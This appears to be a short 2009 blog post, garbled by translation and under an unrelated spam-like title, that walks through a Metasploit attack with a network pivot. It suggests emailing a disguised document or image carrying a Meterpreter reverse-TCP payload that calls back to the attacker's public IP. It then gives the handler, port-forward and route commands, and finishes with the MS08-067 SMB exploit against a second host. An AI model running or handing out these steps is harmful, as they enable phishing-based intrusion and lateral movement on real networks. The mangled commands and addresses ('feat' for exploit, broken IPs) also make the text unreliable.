Saturday, May 2, 2009

How Much Jon Cryer Getpaods

Meterpreter attack pivot [video]



----------------------------------------------
network 1 (wifi)
R1: xx.xx.xx.xx (public IP)
NAT overload + Static PAT (53, 69, 4444, 4445)
A: 192.168.1.8 Laptop BT (attack)
-------------------------- --------------------

R2 network 2: NAT overload (firewall)
B: Desktop XPSP2 192.168.1.67 (target1 - pivot)
C: Laptop XPSP3 192,168 .1.66 (target2)
-------------------------------------------- - A
== == wifi> * Internet * --- R1 -> R2 * * == == wire> B + + == wire ==> C

-------- -------------------------------------- -----------
-----------------------------------
ATTACK 1 (B)

Email this (eg ) of a suspicious file (. macrovba-doc,. pdf,. jpg, etc. ....) which executes a payload tcp reverse.

msfpayload windows / Meterpreter / reverse_tcp LHOST = xx.xx.xx.xx LPORT = 4444 X> # reverse.exe
for the demonstration, we transferred the file via tftp
msfconsole
use multi / handler
set payload windows / Meterpreter / reverse_tcp
set LHOST 192.168.1.8
set LPORT 4444
feat
executes reverse.exe # B ==> 1st Session Meterpreter

------------------ ----------------------------
CONFIGURATION PIVOT on B

portfwd add-L 127.0.0.1-l 4445-r 192168 .1.66-p 445
background
route add 192.168.1.66 1 255 255 255 255
# 1 being the number of session


----------------------------------------- -----
ATTACK 2 (C)
use windows/smb/ms08_067_netapi
set RHOST 192.168.1.66
set RPORT 445
set payload windows / Meterpreter / bind_tcp
set LPORT 4445
feat
# 2nd session Meterpreter

0 comments:

Post a Comment